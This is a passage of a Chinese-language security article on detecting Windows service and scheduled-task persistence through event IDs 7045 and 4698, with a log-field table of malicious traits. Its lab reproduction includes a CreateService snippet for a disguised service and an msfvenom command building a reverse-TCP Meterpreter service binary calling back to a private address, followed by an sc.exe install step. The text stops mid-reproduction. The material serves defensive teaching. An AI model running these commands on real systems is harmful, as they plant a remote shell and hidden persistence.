Windows 事件ID 7045/4698 深度解析:服务与计划任务持久化攻击检测
1. 持久化攻击的技术背景与危害
在网络安全攻防对抗中,持久化(Persistence)是攻击者维持系统访问权限的核心技术手段。根据MITRE ATT&CK框架统计,超过70%的高级持续性威胁(APT)组织会采用服务安装(T1543.003)和计划任务(T1053.005)作为标准战术。这两种技术之所以备受攻击者青睐,主要基于以下特性:
- 隐蔽性强 :通过合法系统机制实现驻留,与正常管理操作特征相似
- 生存周期长 :服务可配置为自动启动,计划任务能定期触发
- 权限维持稳 :通常以SYSTEM或高权限账户运行,不受用户登录状态影响
典型攻击链示例 :
graph TD
A[初始入侵] --> B[权限提升]
B --> C[发现横向移动目标]
C --> D[建立持久化通道]
D --> E[数据渗出]
2. 事件ID 7045:服务安装攻击剖析
2.1 技术原理与日志特征
事件ID 7045记录在系统日志中,对应"服务控制管理器"的"服务安装"操作。攻击者常通过以下API实现服务创建:
SC_HANDLE schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE schService = CreateService(
schSCManager, // SCM数据库句柄
"FakeService", // 服务名
"Windows Update Helper", // 显示名称
SERVICE_ALL_ACCESS, // 访问权限
SERVICE_WIN32_OWN_PROCESS, // 服务类型
SERVICE_AUTO_START, // 启动类型
SERVICE_ERROR_NORMAL, // 错误控制
"C:\\Windows\\temp\\mal.exe", // 二进制路径
NULL, NULL, NULL, NULL, NULL);
关键日志字段解析 :
| 字段名 | 正常值示例 | 恶意特征 |
|---|---|---|
| ServiceName | Winmgmt | 仿冒系统服务名(如svch0st) |
| ImagePath | %SystemRoot%\system32\svchost.exe | 非常规路径(如Temp目录) |
| StartType | 2(自动启动) | 与业务需求不符的启动类型 |
| Account | LocalSystem | 异常服务账户(如域用户) |
2.2 攻击案例复现
实验环境 :
- 靶机:Windows Server 2019 (10.0.17763)
- 攻击工具:Metasploit Framework 6.2
# 生成恶意服务二进制
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe-service -o /tmp/svchost.exe
# 执行服务安装
sc.exe create "BITSProxy" binPath= "C:\Windows\Temp\svchost.exe" start= auto


4513

被折叠的 条评论
为什么被折叠?



